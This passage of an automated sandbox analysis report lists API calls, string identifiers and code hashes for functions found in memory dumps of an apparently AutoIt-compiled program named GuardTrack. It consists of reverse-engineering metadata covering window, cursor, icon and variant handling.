                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI$hd
                                                          • API String ID: 1458621304-344532198
                                                          • Opcode ID: 686fa291ceaac6769d170e7ef7a8e71f4b3ade8d9e8a95005139f2d12c89f8a5
                                                          • Instruction ID: 32c76169963c2c879f1435a282d3650ddfdf5785be061c4ce244e872c3b08870
                                                          • Opcode Fuzzy Hash: 686fa291ceaac6769d170e7ef7a8e71f4b3ade8d9e8a95005139f2d12c89f8a5
                                                          • Instruction Fuzzy Hash: BBB17B75A0020AAFDB18DFA8CC49BEE7FA5FB48311F104529FA15A7290DB70E851CB61
                                                          APIs
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • GetForegroundWindow.USER32(00640980,?,?,?,?,?), ref: 005D04E3
                                                          • IsWindow.USER32(?), ref: 006066BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground_memmove
                                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                          • API String ID: 3828923867-1919597938
                                                          • Opcode ID: 47105c7d8e52ecff44917396be7170d7769945a9dbf6f71b0564af2f4e5a566d
                                                          • Instruction ID: 9fe94ee1dc2241034c2342ad6070542aedbfd65a24adfdf8321d621d129b0798
                                                          • Opcode Fuzzy Hash: 47105c7d8e52ecff44917396be7170d7769945a9dbf6f71b0564af2f4e5a566d
                                                          • Instruction Fuzzy Hash: 3AD1A130144603DFCB18EF64C445A9ABFA6BF95348F104A1EF456932E2DB31E969CB92
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 006344AC
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0063456C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
                                                          • Opcode ID: 65a8cf6141c36d8421d02cac678599bb88e2ab0df7ec07423de527e11b16d4d4
                                                          • Instruction ID: 201b78cbb61e3e56a156e05dbab628d35599f4b76ba2b9f26c723c3092a0a607
                                                          • Opcode Fuzzy Hash: 65a8cf6141c36d8421d02cac678599bb88e2ab0df7ec07423de527e11b16d4d4
                                                          • Instruction Fuzzy Hash: 20A12C302146429FCB14EF64C855AAABBA6BF85314F10496DF8969B3D2DF31FC05CB91
                                                          APIs
                                                          • LoadCursorW.USER32(00000000,00007F89), ref: 006256E1
                                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 006256EC
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 006256F7
                                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00625702
                                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0062570D
                                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00625718
                                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00625723
                                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0062572E
                                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00625739
                                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00625744
                                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0062574F
                                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0062575A
                                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00625765
                                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00625770
                                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0062577B
                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00625786
                                                          • GetCursorInfo.USER32(?), ref: 00625796
                                                          • GetLastError.KERNEL32(00000001,00000000), ref: 006257C1
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Cursor$Load$ErrorInfoLast
                                                          • String ID:
                                                          • API String ID: 3215588206-0
                                                          • Opcode ID: 7a805098f57ff5f72c4a23cf8a7571c0164658e0fdd3a98aa5844e927388b4a9
                                                          • Instruction ID: 7f1a31984ef2c9adda92f8b3071e48e141dd1cd8732c20551012f7755e388dbb
                                                          • Opcode Fuzzy Hash: 7a805098f57ff5f72c4a23cf8a7571c0164658e0fdd3a98aa5844e927388b4a9
                                                          • Instruction Fuzzy Hash: 21418870E443296ADB209FB69C49DAFFFF9EF41B10B10452FE509E7291DAB86401CE51
                                                          APIs
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0060B17B
                                                          • __swprintf.LIBCMT ref: 0060B21C
                                                          • _wcscmp.LIBCMT ref: 0060B22F
                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0060B284
                                                          • _wcscmp.LIBCMT ref: 0060B2C0
                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0060B2F7
                                                          • GetDlgCtrlID.USER32(?), ref: 0060B349
                                                          • GetWindowRect.USER32(?,?), ref: 0060B37F
                                                          • GetParent.USER32(?), ref: 0060B39D
                                                          • ScreenToClient.USER32(00000000), ref: 0060B3A4
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0060B41E
                                                          • _wcscmp.LIBCMT ref: 0060B432
                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0060B458
                                                          • _wcscmp.LIBCMT ref: 0060B46C
                                                            • Part of subcall function 005D385C: _iswctype.LIBCMT ref: 005D3864
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: 946187b10e5244c0d71e90a9f5a6c2d6412f3d01eb684365b4df42b7bc133bf2
                                                          • Instruction ID: d6286c7f31978c0cf0076e151c216d727e71079c615dd043111750dc5a209d5e
                                                          • Opcode Fuzzy Hash: 946187b10e5244c0d71e90a9f5a6c2d6412f3d01eb684365b4df42b7bc133bf2
                                                          • Instruction Fuzzy Hash: E4A1FF71244206AFD718DF64C884FEBBBEAFF44314F10952AF999C2291DB30EA55CB91
                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0060BAB1
                                                          • _wcscmp.LIBCMT ref: 0060BAC2
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0060BAEA
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0060BB07
                                                          • _wcscmp.LIBCMT ref: 0060BB25
                                                          • _wcsstr.LIBCMT ref: 0060BB36
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0060BB6E
                                                          • _wcscmp.LIBCMT ref: 0060BB7E
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0060BBA5
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0060BBEE
                                                          • _wcscmp.LIBCMT ref: 0060BBFE
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0060BC26
                                                          • GetWindowRect.USER32(00000004,?), ref: 0060BC8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 57effe83af8ea3fe8e01d680beed484f5bab4591b87d08e8c2420ce0ab57672f
                                                          • Instruction ID: a2e8a84a70cf629482591986f2a6f13e3de78ec374490842f2c8801be29de00f
                                                          • Opcode Fuzzy Hash: 57effe83af8ea3fe8e01d680beed484f5bab4591b87d08e8c2420ce0ab57672f
                                                          • Instruction Fuzzy Hash: 7881C071044206ABEB18CF14C885FAB7BDAFF84314F04A46AFD898A1D6DB30DD45CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: f4564a89c4ef65e438c688002e9b9e1fe4a713703cd54b5618ce4fe83ebda29d
                                                          • Instruction ID: 8a305efca7acf3c2109e9886a8e01d4ec0303f996277610440de23da0f0febed
                                                          • Opcode Fuzzy Hash: f4564a89c4ef65e438c688002e9b9e1fe4a713703cd54b5618ce4fe83ebda29d
                                                          • Instruction Fuzzy Hash: 6831D834584207AACB18EBE0CD47FEE7BA6BF52350F200129F551B11D2EF956E04CA56
                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 0060CBAA
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0060CBBC
                                                          • SetWindowTextW.USER32(?,?), ref: 0060CBD3
                                                          • GetDlgItem.USER32(?,000003EA), ref: 0060CBE8
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0060CBEE
                                                          • GetDlgItem.USER32(?,000003E9), ref: 0060CBFE
                                                          • SetWindowTextW.USER32(00000000,?), ref: 0060CC04
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0060CC25
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0060CC3F
                                                          • GetWindowRect.USER32(?,?), ref: 0060CC48
                                                          • SetWindowTextW.USER32(?,?), ref: 0060CCB3
                                                          • GetDesktopWindow.USER32 ref: 0060CCB9
                                                          • GetWindowRect.USER32(00000000), ref: 0060CCC0
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0060CD0C
                                                          • GetClientRect.USER32(?,?), ref: 0060CD19
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0060CD3E
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0060CD69
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: 7e266e2451f32bbc436e84230f682a17067f9903df130d6275591f463cd3d7d6
                                                          • Instruction ID: 063fb74cc7d7392ab4787444c550f97dc882be2c9e933160657c6097f7ffff51
                                                          • Opcode Fuzzy Hash: 7e266e2451f32bbc436e84230f682a17067f9903df130d6275591f463cd3d7d6
                                                          • Instruction Fuzzy Hash: 46516030940709EFEB249FA8CD89BAFBBB6FF04715F000618E646A26A0D774A914CB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 0063A87E
                                                          • DestroyWindow.USER32(00000000,?), ref: 0063A8F8
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0063A972
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0063A994
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0063A9A7
                                                          • DestroyWindow.USER32(00000000), ref: 0063A9C9
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,005B0000,00000000), ref: 0063AA00
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0063AA19
                                                          • GetDesktopWindow.USER32 ref: 0063AA32
                                                          • GetWindowRect.USER32(00000000), ref: 0063AA39
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0063AA51
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0063AA69
                                                            • Part of subcall function 005B29AB: GetWindowLongW.USER32(?,000000EB), ref: 005B29BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: 23266f6715a4b4069b39b7224468344e4755c3f90480180ac72482fc6c4abb7d
                                                          • Instruction ID: 16ecb19198c2e92dec780a3bd14eafb257e4c9f8da03d7ce5739af3b975a6541
                                                          • Opcode Fuzzy Hash: 23266f6715a4b4069b39b7224468344e4755c3f90480180ac72482fc6c4abb7d
                                                          • Instruction Fuzzy Hash: 3271AA71150200AFE725CFA8CC48FAA7BE6FB89300F04051DF98A973A1D731E951EB92
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • DragQueryPoint.SHELL32(?,?), ref: 0063CCCF
                                                            • Part of subcall function 0063B1A9: ClientToScreen.USER32(?,?), ref: 0063B1D2
                                                            • Part of subcall function 0063B1A9: GetWindowRect.USER32(?,?), ref: 0063B248
                                                            • Part of subcall function 0063B1A9: PtInRect.USER32(?,?,0063C6BC), ref: 0063B258
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0063CD38
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0063CD43
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0063CD66
                                                          • _wcscat.LIBCMT ref: 0063CD96
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0063CDAD
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0063CDC6
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0063CDDD
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0063CDFF
                                                          • DragFinish.SHELL32(?), ref: 0063CE06
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0063CEF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: 3f1abf555d6f86e5a9c988a51d50376a9e330d3024ca01d5e52a8d5a9e5a95c2
                                                          • Instruction ID: c6f09d994cb8d6d9e31121d201af16b8d7ada47f062f3cd383079ffe17e241f8
                                                          • Opcode Fuzzy Hash: 3f1abf555d6f86e5a9c988a51d50376a9e330d3024ca01d5e52a8d5a9e5a95c2
                                                          • Instruction Fuzzy Hash: FF613B71108301AFD711DF64DC89D9BBBEAFFC9750F00092DF695921A1DB70AA49CB92
                                                          APIs
                                                          • VariantInit.OLEAUT32(00000000), ref: 0061831A
                                                          • VariantCopy.OLEAUT32(00000000,?), ref: 00618323
                                                          • VariantClear.OLEAUT32(00000000), ref: 0061832F
                                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0061841D
                                                          • __swprintf.LIBCMT ref: 0061844D
                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00618479
                                                          • VariantInit.OLEAUT32(?), ref: 0061852A
                                                          • SysFreeString.OLEAUT32(?), ref: 006185BE
                                                          • VariantClear.OLEAUT32(?), ref: 00618618
                                                          • VariantClear.OLEAUT32(?), ref: 00618627
                                                          • VariantInit.OLEAUT32(00000000), ref: 00618665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                          • API String ID: 3730832054-3931177956
                                                          • Opcode ID: bf7c705001947bfe3e88abc7ce6254cd83b8e5334916b66842db9cc8ab0208ba
                                                          • Instruction ID: 1d5960463d53ad12dd54ca07f573a1741906a121a81e281670a41a7da8d3de73
                                                          • Opcode Fuzzy Hash: bf7c705001947bfe3e88abc7ce6254cd83b8e5334916b66842db9cc8ab0208ba
                                                          • Instruction Fuzzy Hash: CFD1B031604516DFDB209FA5C884BEEBBB6BF45700F2C855AE5159B281DF30EC81DBA1
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00634A61
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00634AAC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: 4daf37c6e9a4ea374b64362edb00c102cd5aca396c2f7101ae0dcee385a014fc
                                                          • Instruction ID: 8998055ed779bff2ebd22c00c32ce20ee0cff86e91f6b9773e02f437a3f6e7e9
                                                          • Opcode Fuzzy Hash: 4daf37c6e9a4ea374b64362edb00c102cd5aca396c2f7101ae0dcee385a014fc
                                                          • Instruction Fuzzy Hash: 42914A342047129FCB14EF64C455AAABBA2BF94354F10885DE8965B3A3CF31FD46CB86
                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0063BF26
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006397E7), ref: 0063BF82
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0063BFBB
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0063BFFE
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0063C035
                                                          • FreeLibrary.KERNEL32(?), ref: 0063C041
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0063C051
                                                          • DestroyIcon.USER32(?,?,?,?,?,006397E7), ref: 0063C060
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0063C07D
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0063C089
                                                            • Part of subcall function 005D312D: __wcsicmp_l.LIBCMT ref: 005D31B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: d6b627f1db97a5f07806f01d88dddb568b76e810043a603134da8bdd5c7e1b83
                                                          • Instruction ID: f24c9f61d1e882707dfab6861b89b35159961e0d34e5d8ea396c56abc0668c1f
                                                          • Opcode Fuzzy Hash: d6b627f1db97a5f07806f01d88dddb568b76e810043a603134da8bdd5c7e1b83
                                                          • Instruction Fuzzy Hash: D461F371500219FEEB289F64CC45FFE7BA9FB08720F10410AFA15D62C1DB75AA80DBA0
                                                          APIs
                                                          • GetLocalTime.KERNEL32(?), ref: 0061E31F
                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0061E32F
                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0061E33B
                                                          • __wsplitpath.LIBCMT ref: 0061E399
                                                          • _wcscat.LIBCMT ref: 0061E3B1
                                                          • _wcscat.LIBCMT ref: 0061E3C3
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0061E3D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061E3EC
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061E41E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061E43F
